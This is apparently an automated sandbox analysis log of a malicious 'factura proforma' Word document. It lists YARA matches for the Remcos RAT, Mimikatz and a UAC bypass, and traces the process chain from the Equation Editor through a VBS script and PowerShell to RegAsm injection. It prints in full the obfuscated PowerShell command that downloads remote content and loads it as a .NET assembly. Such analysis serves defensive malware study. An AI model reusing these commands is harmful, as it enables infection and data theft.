                  Source: 12.2.powershell.exe.3d60b60.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 12.2.powershell.exe.3d60b60.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0000000E.00000002.923500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0000000C.00000002.413003630.00000000036D9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0000000C.00000002.413003630.00000000038F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 3916, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: Process Memory Space: powershell.exe PID: 4032, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: Process Memory Space: RegAsm.exe PID: 3036, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4471D5D4.doc, type: DROPPEDMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                  Source: bhv77DF.tmp.15.drBinary or memory string: org.slneighbors
                  Source: classification engineClassification label: mal100.rans.phis.troj.spyw.expl.evad.winDOC@20/31@10/6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,15_2_004182CE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,14_2_0041798D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 18_2_00410DE1 GetCurrentProcess,GetLastError,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,18_2_00410DE1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 15_2_00418758 GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,15_2_00418758
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,14_2_0040F4AF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,14_2_0041B539
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 14_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,14_2_0041AADB
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$ctura proforma .docx.docJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-EPF38I
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR7DF5.tmpJump to behavior
                  Source: factura proforma .docx.docOLE indicator, Word Document stream: true
                  Source: factura proforma .docx.docOLE indicator, Word Document stream: true
                  Source: factura proforma .docx.docOLE document summary: title field not present or empty
                  Source: factura proforma .docx.docOLE document summary: title field not present or empty
                  Source: ~WRF{29D0D8AE-3680-4F24-B6B5-4CF617677437}.tmp.0.drOLE document summary: title field not present or empty
                  Source: ~WRF{29D0D8AE-3680-4F24-B6B5-4CF617677437}.tmp.0.drOLE document summary: edited time not present or 0
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSystem information queried: HandleInformationJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                  Source: RegAsm.exe, RegAsm.exe, 00000010.00000002.431695257.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                  Source: RegAsm.exe, 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                  Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.423462620.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                  Source: factura proforma .docx.docVirustotal: Detection: 11%
                  Source: factura proforma .docx.docReversingLabs: Detection: 13%
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                  Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                  Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\sdpukoyfqajsixcdwmqaiv"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cxunlhrzeibfklqhoxlbtidgm"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa"
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" Jump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\sdpukoyfqajsixcdwmqaiv"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\cxunlhrzeibfklqhoxlbtidgm"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\naaxlzcasqtkurntxhxvwmppvrwa"Jump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                  Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
